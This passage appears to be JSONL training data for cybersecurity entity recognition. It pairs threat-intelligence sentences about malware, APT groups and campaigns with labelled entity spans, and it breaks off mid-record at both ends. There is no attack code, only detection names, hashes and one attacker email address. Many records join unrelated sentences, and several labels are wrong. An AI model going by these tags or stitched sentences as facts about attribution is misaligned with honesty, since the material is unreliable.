Backdoor/W32.Small.8192.U Backdoor.Win32.Small!O Backdoor.Small Backdoor/Small.aad BKDR_SMALL.LIY Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/MalwareS.BJDC BKDR_SMALL.LIY Win.Trojan.Small-15022 Backdoor.Win32.Small.aad Trojan.Win32.Small.cgfnz Backdoor.Win32.A.Small.8192.J Backdoor.Win32.Small.~C W32/Risk.EHGV-6738 Backdoor/Small.cqd W32.Malware.Downloader 
BDS/Small.L Trojan[Backdoor]/Win32.Small Backdoor.W32.Small.aad!c Backdoor.Win32.Small.aad Backdoor:Win32/Neporoot.A Trojan/Win32.Downloader.C113283 Backdoor.Small Trj/CI.A Win32.Backdoor.Small.Eckj Trojan.DL.Troxen!zKvgG9AM1Ro Backdoor.Win32.Small W32/CMDer.AA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007721", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Skypii Trojan/Injector.aech Trojan.Johnnie.D5D69 W32.Phopifas Win.Trojan.Zbot-63011 Trojan-Dropper.Win32.Injector.tsab Trojan.Win32.Zbot.crqlec Trojan.Win32.Z.Johnnie.44972 Trojan.MulDrop2.64582 Trojan.Win32.Injector W32/Trojan.GAQU-5890 TR/Buzus.A.287 Worm:Win32/Skypii.A Trojan-Dropper.Win32.Injector.tsab Trojan/Win32.Inject.R57535 BScope.Adware.Softpulse Win32.Trojan-dropper.Injector.Hyah W32/Inject.AEC!tr Win32/Trojan.Downloader.31f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007722", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Brancud Dropper.Wlord.Win32.197 Trojan/Dropper.Wlord.vg Trojan.Barys.D14BD W32/Backdoor2.FFAV Win.Trojan.Delf-10381 Trojan.Win32.Pigeon.edgwvf NetWorm.Win32.Kolab.~F BackDoor.Pigeon.14364 BehavesLike.Win32.HLLP.vc Trojan.Win32.ProcessHijack W32/Backdoor.UDBV-8754 Win32.Troj.Wlord.vg.kcloud Spyware.Wlord.Dr.2888704 TrojanDropper.Wlord Win32/TrojanDropper.Delf.NQG Win32.Trojan-dropper.Wlord.Wncj Trojan.DR.Wlord!ooBDWiiijA4 Win32/Trojan.f50", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007725", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9947 Trojan.Razy.D1B384 Backdoor:MSIL/Gataspi.A Backdoor.NanoCore Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007727", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Proxyier!O DNSChanger.cw Trojan.Zusy.Elzob.D136F TROJ_DNSCHANGER_0000063.TOMA Win32.Trojan.WisdomEyes.16070401.9500.9713 
TROJ_DNSCHANGER_0000063.TOMA Win.Trojan.B-445 Backdoor.Win32.Simda.ph Trojan.Win32.Simda.bxootp Backdoor.Proxyier.Win32.9 BehavesLike.Win32.Backdoor.fc Backdoor/Proxyier.o Trojan/Win32.Proxyier Trojan:Win64/Simda.A Backdoor.Win32.Simda.ph Trojan/Win32.Jorik.R13830 SScope.Trojan-Proxy.1821 Trojan.FakeAlert Trojan.Win32.FakeAV W32/Binder.RZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007728", "source": "cyner2_train"}} {"text": "The malware infected a wide spread of Android users in China, stealing their bank credentials and other sensitive personal information.", "spans": {"MALWARE: malware": [[4, 11]], "SYSTEM: Android users": [[38, 51]]}, "info": {"id": "cyner2_train_007729", "source": "cyner2_train"}} {"text": "UrlZone is a banking trojan that appeared in 2009.", "spans": {"MALWARE: UrlZone": [[0, 7]], "MALWARE: banking trojan": [[13, 27]]}, "info": {"id": "cyner2_train_007731", "source": "cyner2_train"}} {"text": "There has been considerable discussion about domain fronting following the release of a paper detailing these techniques.", "spans": {}, "info": {"id": "cyner2_train_007733", "source": "cyner2_train"}} {"text": "This attack was dubbed Dark Seoul'; it involved wreaking havoc on affected systems by wiping their hard drives, in addition to seeking military intelligence.", "spans": {"THREAT_ACTOR: Dark Seoul';": [[23, 35]], "SYSTEM: affected systems": [[66, 82]]}, "info": {"id": "cyner2_train_007734", "source": "cyner2_train"}} {"text": "Last week, Patrick Wardle published a very nice analysis of a new Backdoor and Dropper used by HackingTeam, which is apparently alive and well.", "spans": {"ORGANIZATION: Wardle published": [[19, 35]], "MALWARE: Backdoor": [[66, 74]], "MALWARE: Dropper": [[79, 86]], "ORGANIZATION: HackingTeam,": [[95, 107]]}, "info": {"id": "cyner2_train_007735", "source": "cyner2_train"}} {"text": "Indicators imply an exploitation attempt, that may not have been successful.", "spans": {"VULNERABILITY: 
exploitation": [[20, 32]]}, "info": {"id": "cyner2_train_007737", "source": "cyner2_train"}} {"text": "A backdoor also known as: Pdf.Fareit.A PDF/PowerShell.C Exploit.PDF.16243 HEUR_PDF.PS TrojanDownloader:Win32/Perferd.A PDF/Exploit.S3 PDF/PowerShell.ECC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007738", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Python.Simplified.b Trojan.Py2Exe.HackSpy.ekhfvk Trojan.DownLoader25.20169 Trojan.Python.Simplified.b Trojan:Win32/Pitroj.A Trj/CI.A Win32.Trojan.Simplified.Dxmm W32/Python_Simplified.B!tr Win32/Trojan.IM.2b4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007741", "source": "cyner2_train"}} {"text": "Over the past month, Palo Alto Networks has observed two spam campaigns targeting users residing in Italy.", "spans": {"ORGANIZATION: Palo Alto Networks": [[21, 39]], "THREAT_ACTOR: spam campaigns": [[57, 71]]}, "info": {"id": "cyner2_train_007742", "source": "cyner2_train"}} {"text": "possibly working independently while sharing information between themselves, are exploiting the Elasticsearch vulnerability primarily to establish widespread DDoS botnet infrastructures.", "spans": {"VULNERABILITY: exploiting the Elasticsearch vulnerability": [[81, 123]], "MALWARE: DDoS botnet": [[158, 169]], "SYSTEM: infrastructures.": [[170, 186]]}, "info": {"id": "cyner2_train_007743", "source": "cyner2_train"}} {"text": "A cross-platform win32-based Mirai spreader and botnet is in the wild and previously discussed publicly.", "spans": {"SYSTEM: cross-platform win32-based": [[2, 28]], "MALWARE: Mirai spreader": [[29, 43]], "MALWARE: botnet": [[48, 54]]}, "info": {"id": "cyner2_train_007745", "source": "cyner2_train"}} {"text": "When DualToy began to spread in January 2015, it was only capable of infecting Android devices.", "spans": {"MALWARE: DualToy": [[5, 12]], "SYSTEM: Android devices.": [[79, 95]]}, "info": {"id": "cyner2_train_007746", "source": 
"cyner2_train"}} {"text": "This group is well known for a widely publicized attack involving the compromise of Forbes.com, in which the site was used to compromise selected targets via a watering hole to a zero-day Adobe Flash exploit.", "spans": {"THREAT_ACTOR: group": [[5, 10]], "VULNERABILITY: zero-day": [[179, 187]], "MALWARE: Adobe Flash exploit.": [[188, 208]]}, "info": {"id": "cyner2_train_007747", "source": "cyner2_train"}} {"text": "For example, intended victims frequently have titles of Chief Financial Officer, Head of Finance, Senior Vice President, Director and other high level roles.", "spans": {"ORGANIZATION: Chief Financial Officer, Head of Finance, Senior Vice President, Director": [[56, 129]], "ORGANIZATION: high level roles.": [[140, 157]]}, "info": {"id": "cyner2_train_007748", "source": "cyner2_train"}} {"text": "Links returned by a Google search, however, are not guaranteed to be safe.", "spans": {"SYSTEM: a Google search,": [[18, 34]]}, "info": {"id": "cyner2_train_007750", "source": "cyner2_train"}} {"text": "This paper has already stated that we believe the Dukes to be a Russian state-sponsored cyberespionage operation .", "spans": {"THREAT_ACTOR: Dukes": [[50, 55]]}, "info": {"id": "cyberner_stix_train_000000", "source": "cyberner_stix_train"}} {"text": "This file contains all HTML , CSS and PNG files necessary to create overlays . However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US . Derusbi : File Type :P E32 executable ( DLL ) Intel 80386, for MS Windows . 
UNC2639 was first identified exploiting multiple zero - day vulnerabilities in Microsoft Exchange in early March 2021 .", "spans": {"THREAT_ACTOR: group": [[93, 98]], "THREAT_ACTOR: MuddyWater": [[106, 116]], "MALWARE: Derusbi": [[199, 206]], "TOOL: DLL": [[239, 242]], "SYSTEM: MS Windows": [[262, 272]], "THREAT_ACTOR: UNC2639": [[275, 282]], "VULNERABILITY: multiple zero - day vulnerabilities": [[315, 350]], "TOOL: Microsoft Exchange": [[354, 372]]}, "info": {"id": "cyberner_stix_train_000001", "source": "cyberner_stix_train"}} {"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 Administrator permissions are required for hot patching , and the technique used by PLATINUM does not attempt to evade this requirement through exploitation . Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan .", "spans": {"THREAT_ACTOR: PLATINUM": [[14, 22], [199, 207]], "ORGANIZATION: Kaspersky Lab": [[283, 296]], "TOOL: C&C": [[327, 330]]}, "info": {"id": "cyberner_stix_train_000002", "source": "cyberner_stix_train"}} {"text": "The implant can log in to the attackers email inbox , parse emails for commands in a special “ Cmd ” folder and save any payloads to a device from email attachments . Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants . APT33 : 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 S-SHA2 SniffPass . 
This enables GOGETTER to maintain persistence across reboots .", "spans": {"TOOL: Bankshot": [[167, 175]], "ORGANIZATION: Department of Homeland Security": [[202, 233]], "THREAT_ACTOR: APT33": [[320, 325]], "MALWARE: 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 S-SHA2 SniffPass": [[328, 409]], "TOOL: GOGETTER": [[425, 433]]}, "info": {"id": "cyberner_stix_train_000003", "source": "cyberner_stix_train"}} {"text": "PROMETHIUM is an activity group that has been active since at least 2012 . The attackers have targeted a large number of organizations globally since early 2017 , with the main focus on the Middle East and North Africa ( MENA ) , especially Palestine .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: activity group": [[17, 31]]}, "info": {"id": "cyberner_stix_train_000004", "source": "cyberner_stix_train"}} {"text": "We expect it to churn out new variants with even more sophisticated techniques . traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . TAU modified the original HexRaysDeob to make it work for APT10 ANEL obfuscations . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": {"ORGANIZATION: aerospace": [[108, 117]], "ORGANIZATION: energy": [[120, 126]], "ORGANIZATION: government": [[129, 139]], "ORGANIZATION: high-tech": [[142, 151]], "ORGANIZATION: consulting services": [[154, 173]], "ORGANIZATION: chemicals": [[180, 189]], "ORGANIZATION: manufacturing": [[192, 205]], "ORGANIZATION: mining sectors": [[208, 222]], "ORGANIZATION: TAU": [[225, 228]], "TOOL: HexRaysDeob": [[251, 262]], "THREAT_ACTOR: APT10": [[283, 288]], "MALWARE: ANEL": [[289, 293]]}, "info": {"id": "cyberner_stix_train_000005", "source": "cyberner_stix_train"}} {"text": "It has several protections in place , both in the C2 and the malware 's code . 
An additional campaign has also been observed targeting Japanese entities . The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM . Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns ( e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s ) ) .", "spans": {"ORGANIZATION: Microsoft": [[227, 236]], "THREAT_ACTOR: BARIUM": [[259, 265]]}, "info": {"id": "cyberner_stix_train_000006", "source": "cyberner_stix_train"}} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "THREAT_ACTOR: OurMine": [[89, 96]], "ORGANIZATION: WikiLeaks'": [[127, 137]], "ORGANIZATION: Twitter": [[189, 196], [253, 260]], "ORGANIZATION: Mark Zuckerberg": [[234, 249]], "ORGANIZATION: Pinterest": [[265, 274]], "ORGANIZATION: BuzzFeed": [[304, 312]], "ORGANIZATION: TechCrunch": [[317, 327]]}, "info": {"id": "cyberner_stix_train_000007", "source": "cyberner_stix_train"}} {"text": "Decrypting the assets After being decrypted , the asset turns into the .dex file . RoyalDNS - required APT15 . The image file “order.jpg” contained in the first ZIP structure is actually a non-malicious PNG formatted image . 
Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"TOOL: RoyalDNS": [[83, 91]], "THREAT_ACTOR: APT15": [[103, 108]], "VULNERABILITY: vulnerabilities are accessible via the internet": [[265, 312]]}, "info": {"id": "cyberner_stix_train_000008", "source": "cyberner_stix_train"}} {"text": "The infographic in Figure 1 traces the earliest known dates on which TA505 began distributing particular malware strains , beginning with Dridex in 2014 and most recently when they elevated GlobeImposter and Philadelphia from small , regionally targeted ransomware variants to global threats .", "spans": {"THREAT_ACTOR: TA505": [[69, 74]], "MALWARE: Dridex": [[138, 144]], "MALWARE: GlobeImposter": [[190, 203]], "MALWARE: Philadelphia": [[208, 220]]}, "info": {"id": "cyberner_stix_train_000009", "source": "cyberner_stix_train"}} {"text": "For more information related to HIDDEN COBRA activity , go to https://www.us-cert.gov/hiddencobra .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[32, 44]], "URL: https://www.us-cert.gov/hiddencobra": [[62, 97]]}, "info": {"id": "cyberner_stix_train_000010", "source": "cyberner_stix_train"}} {"text": "Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The targets and themes of Bahamut 's campaigns have consistently fallen within two regions – South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) .", "spans": {"THREAT_ACTOR: ‘Operation Sheep’": [[7, 24]], "VULNERABILITY: Man-in-the-Disk": [[123, 138]]}, "info": {"id": "cyberner_stix_train_000011", "source": "cyberner_stix_train"}} {"text": "] net is not awfully well maintained or updated to the latest apps available . 
Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 .", "spans": {"ORGANIZATION: Henkel": [[79, 85]], "THREAT_ACTOR: Winnti": [[99, 105]], "THREAT_ACTOR: APT16": [[436, 441]]}, "info": {"id": "cyberner_stix_train_000012", "source": "cyberner_stix_train"}} {"text": "Donot , named and tracked by PatchSky , is an attack group that mainly targets countries such as Pakistan in South Asia . Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT – a cloud service-based backdoor . ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication . FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto . ESET recently uncovered a new addition to OceanLotus’s toolset targeting Mac OS . 
In mid-2018 , Kaspersky's report on Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges . Kaspersky also observed some activity from Gaza Team and MuddyWater . Kaspersky wrote about LuckyMouse targeting national data centers in June . Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China . Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence . In August 2019 , FireEye released the Double Dragon” report on our newest graduated threat group , APT41 . Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations . Group-IB experts continuously monitor the Silence’ activities . Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia . Group-IB reveals the unknown details of attacks from one of the most notorious APT groups , Lazarus . Finally , Kaspersky produced a summary report on Sofacy’s summertime activity . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis . 
Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day .", "spans": {"THREAT_ACTOR: Donot": [[0, 5]], "ORGANIZATION: PatchSky": [[29, 37]], "ORGANIZATION: Kaspersky": [[136, 145], [323, 332], [648, 657], [937, 946], [1499, 1508], [1569, 1578], [1644, 1653], [1825, 1834], [2654, 2663], [2724, 2733], [2929, 2938], [2961, 2970]], "THREAT_ACTOR: Lazarus": [[172, 179], [1448, 1455], [2634, 2641]], "ORGANIZATION: mobile gaming": [[199, 212]], "THREAT_ACTOR: ScarCruft": [[342, 351]], "MALWARE: ROKRAT": [[453, 459]], "ORGANIZATION: ESET": [[495, 499], [1280, 1284]], "FILEPATH: sample": [[531, 537]], "THREAT_ACTOR: OceanLotus": [[547, 557], [1155, 1165]], "THREAT_ACTOR: actor": [[614, 619]], "ORGANIZATION: PLATINUM": [[677, 685]], "ORGANIZATION: FireEye": [[790, 797], [2070, 2077], [2168, 2175]], "ORGANIZATION: APT40": [[806, 811]], "THREAT_ACTOR: TEMP.Periscope": [[879, 893]], "THREAT_ACTOR: Leviathan": [[896, 905]], "THREAT_ACTOR: TEMP.Jumper": [[910, 921]], "THREAT_ACTOR: PROJECTM": [[1010, 1018]], "THREAT_ACTOR: MYTHIC LEOPARD": [[1023, 1037]], "ORGANIZATION: military": [[1136, 1144]], "MALWARE: KerrDown": [[1242, 1250]], "ORGANIZATION: Palo Alto": [[1268, 1277]], "THREAT_ACTOR: OceanLotus’s": [[1322, 1334]], "ORGANIZATION: Kaspersky's": [[1376, 1387]], "THREAT_ACTOR: MuddyWater": [[1556, 1566]], "ORGANIZATION: LuckyMouse": [[1591, 1601], [1675, 1685]], "THREAT_ACTOR: Oilrig": [[1898, 1904]], "THREAT_ACTOR: Stonedrill": [[1909, 1919]], "THREAT_ACTOR: APT41": [[2152, 2157], [2235, 2240]], "ORGANIZATION: financially": [[2350, 2361]], "ORGANIZATION: Group-IB": [[2385, 2393], [2449, 2457], [2542, 2550]], "THREAT_ACTOR: Silence’": [[2427, 2435]], "THREAT_ACTOR: MoneyTaker": [[2489, 2499]], "ORGANIZATION: banks": [[2512, 2517]], "THREAT_ACTOR: Sofacy’s": [[2693, 2701]], "THREAT_ACTOR: Scarcruft": [[2823, 2832]], "THREAT_ACTOR: Bluenoroff": [[2837, 2847]], "THREAT_ACTOR: BlackOasis": [[2948, 2958]], "THREAT_ACTOR: 
BlackOasis’": [[2993, 3004]], "TOOL: Flash": [[3064, 3069]], "VULNERABILITY: zero day": [[3070, 3078]]}, "info": {"id": "cyberner_stix_train_000013", "source": "cyberner_stix_train"}} {"text": "Threat Actor Profile : TA505 , From Dridex to GlobeImposter .", "spans": {"THREAT_ACTOR: TA505": [[23, 28]], "MALWARE: Dridex": [[36, 42]], "MALWARE: GlobeImposter": [[46, 59]]}, "info": {"id": "cyberner_stix_train_000014", "source": "cyberner_stix_train"}} {"text": "November 16 , 2016 In what 's being chalked up as an apparent mistake , more than 120,000 Android phones sold in the U.S. were shipped with spying code that sent text messages , call logs and other sensitive data to a server in Shanghai . This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack . The actor embedded malicious code to a resource section of the legitimate SFX file created by a file encryption tool , and modified the entry point of the program for jumping to the malicious code soon after the SFX program starts .", "spans": {"SYSTEM: Android": [[90, 97]], "THREAT_ACTOR: APT10": [[354, 359]]}, "info": {"id": "cyberner_stix_train_000015", "source": "cyberner_stix_train"}} {"text": "Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from . 
Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: FireEye": [[199, 206]], "THREAT_ACTOR: TEMP.Veles": [[274, 284]], "MALWARE: TRITON": [[332, 338]], "ORGANIZATION: Dragos": [[355, 361]], "THREAT_ACTOR: XENOTIME": [[438, 446]]}, "info": {"id": "cyberner_stix_train_000016", "source": "cyberner_stix_train"}} {"text": "] databit [ . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar . The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692 . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": {"THREAT_ACTOR: Mofang": [[37, 43]], "FILEPATH: 832f5e01be536da71d5b3f7e41938cfb": [[179, 211]], "MALWARE: Aumlib": [[238, 244]], "FILEPATH: cb3dcde34fd9ff0e19381d99b02f9692": [[267, 299]], "ORGANIZATION: US - based retailers": [[385, 405]], "ORGANIZATION: local governments": [[408, 425]], "ORGANIZATION: university": [[430, 440]], "ORGANIZATION: engineering firm": [[450, 466]]}, "info": {"id": "cyberner_stix_train_000017", "source": "cyberner_stix_train"}} {"text": "It is also possible that this functionality is under development , making this placeholder code incomplete . Cylance determined that the ‘Ghost Dragon’ group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 . 
The first three are generated by rand() and the fourth is computed based on the first and third .", "spans": {"ORGANIZATION: Cylance": [[109, 116]], "THREAT_ACTOR: ‘Ghost Dragon’": [[137, 151]], "TOOL: Gh0st RAT": [[201, 210]], "TOOL: rand()": [[330, 336]]}, "info": {"id": "cyberner_stix_train_000018", "source": "cyberner_stix_train"}} {"text": "As the previous picture demonstrated , the followed Vector object ’s length field being overflowed as 0x80007fff , which enables the attacker to read/write arbitrary data within user space .", "spans": {}, "info": {"id": "cyberner_stix_train_000019", "source": "cyberner_stix_train"}} {"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: CMD/PowerShell": [[40, 54]], "THREAT_ACTOR: attackers": [[72, 81]]}, "info": {"id": "cyberner_stix_train_000020", "source": "cyberner_stix_train"}} {"text": "The Hillary Clinton email leak was the center of the latest scandal in the news caused by Threat Group-4127 ( TG-4127 ) .", "spans": {"TOOL: email": [[20, 25]], "THREAT_ACTOR: Threat Group-4127": [[90, 107]], "THREAT_ACTOR: TG-4127": [[110, 117]]}, "info": {"id": "cyberner_stix_train_000021", "source": "cyberner_stix_train"}} {"text": "The bootkit Android.Oldboot has infected more than 350,000 android users in China , Spain , Italy , Germany , Russia , Brazil , the USA and some Southeast Asian countries . It was a targeted attack we are calling \" Machete \" . In seeking to identify the organization behind this activity ,our research found that People ’s Liberation Army ( PLA ’s ) Unit 61398 is similar to APT1 in its mission , capabilities , and resources . 
Clients using Internet Explorer version 8 are served with “ about.htm ” , for other versions of the browser and for any other browser capable of running Java applets , the JavaScript code loads “ JavaApplet.html ” .", "spans": {"MALWARE: Android.Oldboot": [[12, 27]], "SYSTEM: android": [[59, 66]], "ORGANIZATION: People ’s Liberation Army": [[313, 338]], "ORGANIZATION: PLA": [[341, 344]], "ORGANIZATION: Unit 61398": [[350, 360]], "THREAT_ACTOR: APT1": [[375, 379]], "SYSTEM: Internet Explorer version 8": [[442, 469]]}, "info": {"id": "cyberner_stix_train_000022", "source": "cyberner_stix_train"}} {"text": "NOVEMBER 2016 , The OSCE confirmed that it had suffered an intrusion , which a Western intelligence service attributed to APT28 .", "spans": {"ORGANIZATION: OSCE": [[20, 24]], "THREAT_ACTOR: APT28": [[122, 127]]}, "info": {"id": "cyberner_stix_train_000023", "source": "cyberner_stix_train"}} {"text": "The group Magic Hound is linked via infrastructure and tools to the Rocket Kitten threat actor group although Palo Alto cannot confirm the extent of any relationship between the two groups .", "spans": {"THREAT_ACTOR: Magic Hound": [[10, 21]], "THREAT_ACTOR: Rocket Kitten": [[68, 81]]}, "info": {"id": "cyberner_stix_train_000024", "source": "cyberner_stix_train"}} {"text": "APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors . 
In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "ORGANIZATION: military": [[52, 60]], "ORGANIZATION: diplomatic": [[63, 73]], "ORGANIZATION: government personnel": [[78, 98]], "ORGANIZATION: organizations": [[101, 114]], "ORGANIZATION: media": [[122, 127]], "ORGANIZATION: energy": [[130, 136]], "ORGANIZATION: defense industrial base": [[141, 164]], "ORGANIZATION: DIB": [[167, 170]], "ORGANIZATION: engineering": [[179, 190]], "ORGANIZATION: business services": [[193, 210]], "ORGANIZATION: telecommunications sectors": [[215, 241]], "ORGANIZATION: security firm": [[272, 285]], "ORGANIZATION: Resecurity": [[286, 296]]}, "info": {"id": "cyberner_stix_train_000025", "source": "cyberner_stix_train"}} {"text": "It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category .", "spans": {"THREAT_ACTOR: group": [[20, 25]], "ORGANIZATION: telecommunications": [[161, 179]], "ORGANIZATION: defense industries": [[184, 202]], "FILEPATH: malicious sample": [[220, 236]]}, "info": {"id": "cyberner_stix_train_000026", "source": "cyberner_stix_train"}} {"text": "Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . 
Dokument 09.06.2017.zip .", "spans": {"MALWARE: More_eggs malware": [[31, 48]], "MALWARE: cmd.exe": [[132, 139]], "FILEPATH: Dokument 09.06.2017.zip": [[142, 165]]}, "info": {"id": "cyberner_stix_train_000027", "source": "cyberner_stix_train"}} {"text": "Cannon acknowledges the receipt of file download by sending an email to sahro.bella7@post.cz with l.txt ( contains 090 string ) as the attachment , ok2 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[63, 68]], "EMAIL: sahro.bella7@post.cz": [[72, 92]], "FILEPATH: l.txt": [[98, 103]]}, "info": {"id": "cyberner_stix_train_000028", "source": "cyberner_stix_train"}} {"text": "These malware pose as legitimate Facebook or Chrome applications . The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India . Generic : aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7 Trojan S-MAL/Downloader ( Executable file ) .", "spans": {"SYSTEM: Facebook": [[33, 41]], "SYSTEM: Chrome": [[45, 51]], "ORGANIZATION: Shanghai Cooperation Organization": [[157, 190]], "THREAT_ACTOR: espionage": [[210, 219]], "MALWARE: Generic": [[239, 246]], "FILEPATH: aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7": [[249, 313]], "TOOL: Trojan S-MAL/Downloader": [[314, 337]]}, "info": {"id": "cyberner_stix_train_000029", "source": "cyberner_stix_train"}} {"text": "One method , which was popular in Germany , is known as mobile TAN ( mTAN ) . Related or not , one thing is certain : the actor ( s ) using these customized BlackEnergy malware are intent on stealing information from the targets . 
Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group .", "spans": {"THREAT_ACTOR: actor": [[122, 127]], "TOOL: BlackEnergy malware": [[157, 176]], "THREAT_ACTOR: OilRig group": [[335, 347]]}, "info": {"id": "cyberner_stix_train_000030", "source": "cyberner_stix_train"}} {"text": "QiAnXin identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage . In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . For over eighteen months from March 2017 until November 2018 , Scattered Canary’s frequent enterprise-focused credential phishing campaigns almost exclusively targeted businesses in the United States and Canada . In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards . Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies . In total , 35 actors have been tied to Scattered Canary’s operations since the group emerged in 2008 . Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own . When it comes to engaging targets , Scattered Canary frequently maximized 